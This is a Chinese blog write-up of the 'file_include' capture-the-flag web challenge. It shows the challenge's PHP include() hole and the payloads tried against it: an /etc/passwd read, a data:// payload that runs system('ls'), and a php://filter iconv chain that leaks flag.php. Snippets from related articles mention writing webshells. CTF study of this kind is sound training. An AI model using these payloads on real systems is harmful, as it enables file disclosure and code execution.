ctfer的web日常:file_include(攻防世界)

最新推荐文章于 2024-07-21 12:31:29 发布
最新推荐文章于 2024-07-21 12:31:29 发布
阅读量416 收藏 8
点赞数 9
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hunter1_1/article/details/136611966
版权

代码审计:

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

文件包含漏洞,尝试读取/etc/passwd:

尝试用伪协议:

  • 尝试用file://伪协议,file://flag.php, ;
  • 尝试用data://伪协议,filename=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=,base64解密为<?php system('ls');?>,但是过滤了base64;
  • 尝试用data://伪协议,filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php,成功。

 

 

Hunter1_1
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3512
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
【网络安全 | CTF攻防世界 file_include 解题详析(php伪协议+convert转换过滤器)
等风来
07-31 4852
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该题涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?题目描述:怎么读取文件呢?对于本题,将初始POC。
攻防世界file_include
m0_74979597的博客
09-13 1633
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3312
攻防世界 -- fileinclude
攻防世界-fileinclude
最新发布
2301_79858466的博客
07-21 704
💡 convert.base64-encode/convert.base64-decode是转换过滤器属于read的参数,💡 相当于base64_encode()和 base64_decode(),作用是base64 编码解码。💡 read= 该参数可选。可以设定一个或多个过滤器名称,以 管道符(|)分隔。两个链的过滤器> 任何没有以 read= 或 write= 作前缀的筛选器列表会视情。💡 resource= 必须项。💡 write= 该参数可选。
攻防世界file_include
小缪的博客
06-10 2903
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-file_include
m0_49025459的博客
12-18 7180
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
file_include(攻防世界)
m0_56107268的博客
11-14 7235
php转化器的学习
攻防世界-web-file_include
MateSnake的博客
05-12 504
攻防世界-web-file_include
【网络安全 | CTF攻防世界 fileinclude 解题详析(php伪协议)
等风来
07-31 4132
由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。因此解题思路为:利用php伪协议,构造language参数,来读取该目录下的flag.php文件。,即此处存在文件包含。
OSError: libtorch_cuda_cpp.so: cannot open shared object file: No such file or directory(已解决)
热门推荐
围炉夜敲的博客
07-13 1万+
OSError: libtorch_cuda_cpp.so: cannot open shared object file: No such file or directory(已解决)
攻防世界---fileinclude
m0_72447684的博客
10-11 1203
攻防世界---fileinclude
攻防世界fileinclude
……
09-13 7613
攻防世界文件包含题目
攻防世界-file_include(convert.iconv的使用)
Welcome To Myon'Blog !
04-16 1257
攻防世界file_include、convert.iconv的使用、iconv函数、PHP伪协议、文件包含、转换过滤器
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1699
主要是这个题目的解题过程和原理,可以帮助大家学习文件包含漏洞
Web应用中的SSRF漏洞:file_get_contents与fsockopen
在给定的描述中,虽然没有直接涉及XSS攻击的代码,但提到了Web攻防训练营中有关SSRF漏洞的内容。SSRF(服务端请求伪造)是另一种安全问题,它发生在Web应用允许根据用户提供的信息去访问外部资源时。攻击者可以通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值